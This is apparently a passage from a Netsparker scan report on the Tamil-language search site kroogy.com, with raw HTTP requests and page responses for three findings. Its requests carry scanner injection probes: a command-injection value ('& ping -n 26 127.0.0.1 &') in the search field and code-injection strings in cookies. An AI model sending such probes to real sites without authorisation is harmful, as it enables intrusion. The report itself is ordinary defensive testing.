src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft"> </td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright"> </td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft"> </td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="'& ping -n 26 127.0.0.1 &" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td> </td><td> </td></tr></table></td><td class="searchtdright"> </td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">180,000</span> இல் <span class="resultcountstart">1</span>-<span class="resultcountend">10</span> முடிவுகள்</span></td> <td class="typesearchtd" align="right"><span class="typesearchtext">தேடு வலை</span></td> </tr> <..
Forbidden Resource
Forbidden Resource
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
Impact
There is no impact resulting from this issue.
Request
GET /userdata/ HTTP/1.1 Referer: http://kroogy.com/userdata/homepagelogo.jpg User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden Date: Sun, 24 Apr 2011 12:34:37 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 15 Apr 2011 17:16:02 GMT ETag: "800510-3bb-4a0f8323c7880" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: X-Powered-By: PleskLin Content-Length: 548 Connection: close Content-Type: text/html <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>You do not have permission to access this document.<P><HR><ADDRESS>Web Server at kroogy.com</ADDRESS></BODY></HTML><!-- - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->
E-mail Address Disclosure
E-mail Address Disclosure
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
team@gmail.com
Request
GET /search/web?search=ls+portal&type=web HTTP/1.1 Referer: http://kroogy.com/search/web/LS%20magazine User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8; region=BE-nl; PHPSESSID=totjukp6oqa5l5opadu8gndj05 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:36:31 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 10699 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - ls portal</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - ls portal"><meta name="keywords" content="Kroogy Search,search,search engine,ls portal,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > பெருவிரல்சுவடை காமி <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!--.totaltd { border-bottom:#045c97; border-bottom-style:solid; border-bottom-width:1px; background-color:#e4f2fc; height:20px; padding-left:10px; padding-right:10px; } .typesearchtd { border-bottom:#045c97; border-bottom-style:solid; border-bottom-width:1px; background-color:#e4f2fc; height:20px; padding-left:10px; padding-right:10px; } .conversiontable { width:100%; } .conversiontd { padding-left:10px; padding-right:10px; padding-bottom:20px; } .conversionkeyword { font-size:18px; font-style:italic; } .conversiontarget { font-size:18px; font-style:italic; } .viewmorelinktd { padding-bottom:15px; } .viewmorelink { font-size:12px; } .showimagetd { padding-bottom:5px; } .imagepreviewlinkweb { font-size:12px; } .resultcountstart { font-size:13px; font-weight:bold; } .resultcountend { font-size:13px; font-weight:bold; } .totalresults { font-size:13px; font-weight:bold; } .keywordintotal { font-size:13px; font-weight:bold; } .thumbshotimage { border: 1px solid black; } .outermaincontainer { align:center; width:100%; } .outermainresulttd { vertical-align:top; width:850px; padding:10px; } outermainimageresulttd { vertical-align:top; width:100%; padding:10px; } .totaltable { width:100%; height:30px; padding-left:0px; font-family:Verdana, Arial, Helvetica, sans-serif; } .totaltext { font-size:12px; } .typesearchtext { text-transform: capitalize; font-size:12px; font-weight:bold; } .spelltable { height:30px; width:100%; font-family:Verdana, Arial, Helvetica, sans-serif; padding:20px; } .spellsuggestiontext { padding-left:10px; padding-right:10px; font-size:13px; font-weight:bold; } .spelllink { font-weight:bold; font-size:13px; color:green; } .resultsetwrapper { width:100%; } .resultsetwrappertd { } .resulttable { width:100%; } .thumbshotimage { width:100px; heigth:100px; } .resulttd { width:100%; valign:top; font-family:Verdana, Arial, Helvetica, sans-serif; } .resulttitle { font-size:13px; valign:top; font-family:verdana,Arial, Helvetica, sans-serif; } .resulttitle a:hover { color:red; } .resultlink { } .newwindowimage { width:11px; height:11px; } .resultdescription { font-size:11px; } .resulturl { font-size:12px; color:green; } .emailfrndlink { font-size:12px; } .seperationtd { height:10px; } .footerpagetable { width:100%; } .relatedkeywordstable { width:100%; } .footerpagetd a { text-decoration:none; font-size:14px; color:#0368ab; border-style:solid; border-width:1px; border-color:#a4d7fa; padding-left:8px; padding-right:8px; padding-top:2px; padding-bottom:2px; font-family:Arial, Helvetica, sans-serif; } .footerpagetd a:hover { text-decoration:none; font-size:14px; color:#fff; border-style:solid; border-width:1px; border-color:#a4d7fa; padding-left:8px; padding-right:8px; padding-top:2px; padding-bottom:2px; background-color:#0368ab; } .footerpagetext { font-size:15px; color:black; font-weight:bold; } .footerpagetd { padding:10px; height:40px; } .relatedkeywordstd { height:40px; padding-left:10px; padding-right:10px; font-family:Verdana, Arial, Helvetica, sans-serif; } .relatedkeywordmessage { font-size:12px; font-weight:bold; } .relatedkeywordlink { font-size:12px; font-weight:bold; } .imagedomain { font-size:10px; color:green; line-height:15px; } .imagedetails { font-size:10px; line-height:15px; font } .imagetitle { font-size:11px; line-height:25px; } .imagepreview { font-size:11px; } .imageresulttd { padding-left:10px; padding-bottom:15px; padding-right:10px; font-family:Verdana; } .videoresulttd { padding-bottom:15px; padding-left:10px; padding-right:10px; font-family:Verdana; } .videotitle { font-size:11px; line-height:20px; font-weight:bold; } .videoduration { font-size:10px; color:green; line-height:15px; } .videopublishedon { font-size:10px; line-height:15px; } .thumbshottd { padding-bottom:5px; padding-right:10px; vertical-align:top; padding-left:10px; } .imageresultsinwebtd { padding-left:10px; vertical-align:bottom; } .imageresultinweb { border: 1px solid black; max-height:80px; } .imageresultinwebviewmorelink { font-size:12px; font-weight:bold; } .arithmeticconversiontd { padding-left:10px; padding-right:10px; padding-top:10px; font-size:14px; font-weight:bold; } .qlook { font-size:12px; } .emaillinkimage { width:12px; height:12px; } .arithmeticconversionkeyword { font-size:16px; font-weight:bold; } .arithmeticcoversionresult { font-size:16px; font-weight:bold; } .noresulttext { font-size:12px; font-weight:bold; } .noresulttd { padding-top:15px; padding-left:15px; align-text:center; padding-right:15px; } .quicklooktd { padding-left:10px; } .imageresultinwebviewmorelinktd { padding-bottom:15px; padding-left:10px; padding-right:10px; } .outermainadtd { padding-top:20px; padding-left:10px; padding-right:10px; vertical-align:top; } .amazonnavigationoptiontext { font-size:12px; font-weight:bold; } .amazoncountrytd { padding-top:10px; } .amazoncategorytd { padding-top:10px; } .ebaythumbshotimage { border: 1px solid black; width:80px; } .amazonthumbshotimage { width:55px; border: 1px solid black; } .box { background-color: #F0F8FF; } .border { border-left-color: #d3e1f9; border-right-color: #d3e1f9; }/* CSS Document */ .body td, tr { font-family:Verdana, Arial, Helvetica, sans-serif; } #countries,#optionallanguage,#themegroup { background-color:#e4f2fc; height:22px; border-width:1px; border-style:solid; Border-color:#aaaaaa; } .advancedsearchsubtitletd { padding-bottom:15px; padding-top:10px; padding-left:5px; padding-right:5px; } .advancedsearchtexttd { width:250px; padding-left:5px; height:40px; padding-right:5px; } .advancedsearchfieldtd { padding-bottom:15px; } .advancedsearchtextstyle { font-size:12px; } .advancedsearchtable { width:700px; margin-top:10px; padding-top:5px; padding-bottom:15px; } .advancedsearchexampletext { font-size:12px; } .advancedsearchtitletable { width:700px; margin-top:20px; background-color:#e1e1e1; padding-top:15px; padding-bottom:15px; } .advancedsearchtitletd { padding-left:5px; height:30px; text-align:center; background-color:#e4f2fc; width:100%; border:#045c97; border-style: solid; border-width: 1px; } .advancedsearchsubtitletext { font-size:12px; font-weight:bold; } .footertable { width:100%; padding-top:15px; } .footertext { font-size:12px; } .footertd { padding-left:10px; } .headerlinkstd { width:100%; padding-right:5px; padding-left:5px; padding-top:2px; font-size:13px; padding-bottom:2px; border-bottom:#045c97; background-color: #e4f2fc; border-bottom-style: solid; border-bottom-width: 1px; } .headerlinkstd a ,.headerlinkstd a:visited { color:#000000; font-weight:bold; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; } .languagetd { padding-left:5px; font-size:12px; height:30px; } .headerlink { font-size:12px; } .themetd { padding-left:5px; padding-top:2px; font-size:13px; padding-bottom:2px; border-bottom:#045c97; background-color: #e4f2fc; border-bottom-style: solid; border-bottom-width: 1px; color:#000; } .cloudtagtd { margin-top:20px; padding-top:5px; padding-left:5px; border-color:#77c3fa; border-width:1px; border-style:solid; padding-bottom:5px; padding-left:5px; padding-right:5px; } .cloudtagtd a { font-family:Verdana, Arial, Helvetica, sans-serif; } .generallinks { font-size:12px; } .opendirectorytd { padding-top:10px; } .advancetd { height:20px; padding-left:5px; font-size:13px; } .footerlinktd { height:15px; border-top: #045c97; padding-top:5px; border-top-style: solid; border-top-width: 1px; } .stdpagetitle { font-size:14px; font-weight:bold; } .emailafrndurltd , .emaillinkdesctd { padding-top;5px; background-color:#e4f2fc; padding-bottom:5px; } .emailafrndurl { font-size:12px; font-weight:bold; } .outermainoptionstd { padding-left:15px; padding-right:15px; padding-top:5px; padding-bottom:5px; font-size:12px; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } .outermainlogotd { width:5%; padding-top:5px; padding-bottom:5px; padding-left:15px; padding-right:15px; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } .outermaintabtd { padding-top:10px; padding-bottom:5px; padding-left:0px; padding-right:0px; vertical-align:bottom; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } #mandatory { color:red; font-size:10px; font-weight:bold; vertical-align:top; padding-left:2px; padding-right:2px; } #morelanguagesdiv { font-size:11px; } .advancetd a { font-size:11px; } .generatesearchboxtable { width:900px; margin-top:10px; padding-top:5px; padding-bottom:15px; } .generatesearchboxtitletd { padding-left:5px; height:30px; text-align:center; background-color:#e4f2fc; width:100%; border:#045c97; border-style: solid; border-width: 1px; } .generatesearchboxpagetitle { font-size:14px; font-weight:bold; } .generatesearchboxtexttd { padding-left:5px; height:40px; padding-right:5px; } .generatesearchboxtextstyle { font-size:12px; } .generatesearchboxsubtitletd { padding-bottom:15px; padding-top:10px; padding-left:5px; padding-right:5px; } .generatesearchboxsubtitletext { font-size:12px; font-weight:bold; } .generatesearchboxenginestextstyle { font-size:12px; text-transform: capitalize; } -->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padd..
Redirect Response BODY Is Too Large
Redirect Response BODY Is Too Large
Netsparker identified that the response from the page returned an HTTP Redirect Status but output more information than usual. This generally indicates that after redirect, page did not finish the response as it was supposed to.
Impact
This can lead serious issues such authentication bypass in authentication required pages, in other pages it generally indicates a programming error.
Finish the HTTP Response after you redirect the user.
In ASP.NET use Response.Redirect("redirected-page.aspx", true );
instead of Response.Redirect("redirected-page.aspx", false );
In PHP applications call exit();
after you redirect the user.
Parameters
Parameter
Type
Value
search
GET
%27
type
GET
web
Request
GET /search/web?search=%2527&type=web HTTP/1.1 Referer: http://kroogy.com/search/web/LS%20magazine User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 302 Found Date: Sun, 24 Apr 2011 14:12:50 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin location: http://kroogy.com/search/arithmeticconversion?search=%2527&type=web Vary: Accept-Encoding Content-Encoding: Content-Length: 8094 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - %27</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - %27"><meta name="keywords" content="Kroogy Search,search,search engine,%27,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > பெருவிரல்சுவடை காமி <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> உள��பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var 